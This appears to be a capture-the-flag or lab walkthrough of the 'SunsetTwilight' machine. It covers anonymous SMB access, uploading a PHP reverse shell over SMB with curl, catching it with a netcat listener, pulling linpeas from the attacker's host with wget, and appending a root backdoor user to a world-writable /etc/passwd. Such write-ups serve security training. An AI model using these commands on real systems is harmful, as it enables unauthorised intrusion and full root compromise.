# SunsetTwilight

## Nmap

```
sudo nmap 192.168.120.91 -p- -sS -sV                                                                

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp    open  smtp        Exim smtpd
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2121/tcp  open  ftp         pyftpdlib 1.5.6
3306/tcp  open  mysql       MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
8080/tcp  open  http        PHP cli server 5.5 or later
63525/tcp open  http        PHP cli server 5.5 or later
Service Info: Host: TWILIGHT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

First up is checking SMB. We are able to connect and list shared without providing credentials as shown below:

```
smbclient -U '' -L \\\\192.168.120.91\\ 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-87c5029a294303fe6c7f0f140f467677f77e9879%2Fimage.png?alt=media)

We can then move into the WRKSHARE directory to view the contents:

```
smbclient -U '' \\\\192.168.120.91\\WRKSHARE\\
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8a4df94cdde6ba02141c83b437ad95771a802931%2Fimage.png?alt=media)

As this looks like we can see the entire directory from '/' we can have a look about for interesting information. We know that port 80 is open so likely we are running a webserver.

Looking at the contents of the directory /var/www/html/ we can see PHP files.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ae5ef71a34d0e3b718d5dc8c061e5d289d32dd6d%2Fimage.png?alt=media)

If we can upload a reverse PHP shell we should in theory be able to get shell access. I used the following command to upload a [PHP reverse shell](https://github.com/pentestmonkey/php-reverse-shell) with curl into the /var/www/html directory:

```
curl --upload-file /home/kali/scripts/phpshell.php -u '' smb://192.168.120.91/WRKSHARE/var/www/html/phpshell.php
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-53a14892a42598338e64195c23b6e6c3296c9168%2Fimage.png?alt=media)

Checking the directory contents with `smbclient` again shows we have uploaded our PHP reverse shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-679bcf570e4629044cacabae7520a730993b676b%2Fimage.png?alt=media)

We can then set a `netcat` listener up then execute the shell with `curl`.

```
sudo nc -lvp 80
curl http://192.168.120.91/phpshell.php 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d5ff860b805aa83eaf70406d40936f8062f85be1%2Fimage.png?alt=media)

The current shell can then be improved by:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e868343388e7d9485f6029c7978a3cc23ad79b98%2Fimage.png?alt=media)

Next we can move into the /tmp/ directory. Started a `Python SimpleHTTPServer` on my attacking machine and transferred over `linpeas`.

```
wget http://192.168.49.120/linpeas.sh
```

`linpeas` picks up that /etc/passwd is writeable by everyone. Which means we can make changes to the file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5587b54fd7c97347bc84a0d260863eee10fe57b5%2Fimage.png?alt=media)

As such we can add a new root user to the target machine to gain root access.

Generate password on attacking machine:

```
openssl passwd -1 -salt password password 
```

Echo the password and new user to the end of /etc/passwd on the target machine.

```
echo 'owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash' >> /etc/passwd
```

We can then use `su` to move into the new account and gain a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e8ebe381d5bb88e4f8f6d3db10f7d17f11d6d6ce%2Fimage.png?alt=media)